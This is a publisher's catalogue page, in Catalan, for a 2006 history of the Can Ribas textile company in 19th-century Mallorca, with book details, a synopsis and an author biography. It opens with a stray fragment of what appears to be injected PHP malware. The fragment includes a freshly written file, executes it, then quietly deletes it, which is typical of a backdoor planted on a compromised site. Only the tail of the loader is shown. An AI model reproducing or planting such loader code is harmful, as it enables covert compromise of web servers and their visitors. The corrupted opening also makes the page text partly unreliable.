");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Llana, vapors, cotó i negoci: Una aproximació a la indústria tèxtil de la Mallorca del vuit-cents. El cas de can Ribas (1850-1885)
Cercador d'Obres
ORDENAR:
Començar recerca

Llana, vapors, cotó i negoci: Una aproximació a la indústria tèxtil de la Mallorca del vuit-cents. El cas de can Ribas (1850-1885)

Roca i Avellà, Joan

Col·lecció:
Arbre de Mar
Tema:
Història contemporània
Pàgines:
204
PVP:
20.00
ISBN:
84-96376-84-2
Data d'Edició:
29/09/2006
Sinopsi
Aquest treball analitza els orígens i la consolidació de la que potser va ser la principal empresa tèxtil de la Mallorca preturística –popularment coneguda per Can Ribas–, creada a Palma pel fabricant Vicenç Juan Rosselló a mitjan segle XIX en un context de gran interès històric i socioeconòmic, és a dir, el procés d’industrialització que es produí a Mallorca en la segona meitat del vuit-cents. Des de la perspectiva de l’anàlisi microeconòmica –l’autor ha fonamentat el seu estudi en la documentació generada per la pròpia firma–, s’estableixen els eixos bàsics de l’estratègia empresarial d’aquest important fabricant i els seus descendents, vertaders exponents del que hom pot anomenar burgesia industrial i exemple significatiu de quina era la realitat empresarial de la Mallorca del final del segle XIX. Els Juan, com també altres industrials tèxtils de Palma, Sóller o Esporles, saberen assolir màxims nivells de competitivitat a partir d’una política empresarial agressiva basada en un coneixement exhaustiu dels mercats de proveïment de primeres matèries –principalment la llana–, una constant presència en els mercats consumidors –sobretot la península Ibèrica– i un equilibri molt suggeridor entre modernitat i tradició.
Joan Roca i Avellà
(Palma, 1966) és llicenciat en Història per la Universitat de les Illes Balears (1989), professor d’ensenyament secundari i professor associat de la UIB. Especialitzat en el procés industrialitzador mallorquí dels segles xix i xx, és col·laborador del Grup d’Estudis d’Història Econòmica (UIB) i ha publicat diversos estudis i articles sobre les transformacions del sector tèxtil en la Mallorca vuitcentista, l’evolució de l’empresa industrial i la situació del patrimoni arqueològic mallorquí generat pels processos d’industrialització. A Edicions Documenta Balear ha publicat La indústria a Mallorca (segles XIX-XX) (2006), Llana, vapors, cotó i negoci. Una aproximació a la indústria tèxtil de la Mallorca del vuit-cents. El cas de can Ribas (1850-1885) (2006) i La indústria mallorquina durant el franquisme (1939-1975) (2011).


Recomanar
Comentar
Comentaris (0)